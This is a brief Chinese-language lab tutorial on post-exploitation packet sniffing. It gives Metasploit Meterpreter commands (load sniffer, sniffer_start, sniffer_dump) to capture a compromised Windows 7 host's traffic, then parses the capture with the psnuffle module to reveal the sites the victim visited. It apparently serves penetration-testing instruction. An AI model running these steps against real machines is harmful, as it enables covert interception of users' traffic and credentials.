环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木马及监听主机参考上篇文章:
内网渗透 -- 提升权限(利用提权漏洞)
二、捕获数据包
1、加载sniffer:load sniffer
2、查看网卡信息:sniffer_interfaces
3、开启网卡监听,内容会自动保存到缓存中:sniffer_start 2
4、进入小受,然后随便访问几个网站
4、将捕获到数据保存下来,默认保存地址/root
sniffer_dump 2 aiyou.cap
5、启动wireshark,打开保存下来的文件
三、通过解包模块解包
1、选择解包模块
use auxiliary/sniffer/psnuffle
2、查看需要设置的参数
show options
3、设置解包文件路径
set pcapfile /root/2.cap
4、运行,run,可以查看到我们刚才访问的地址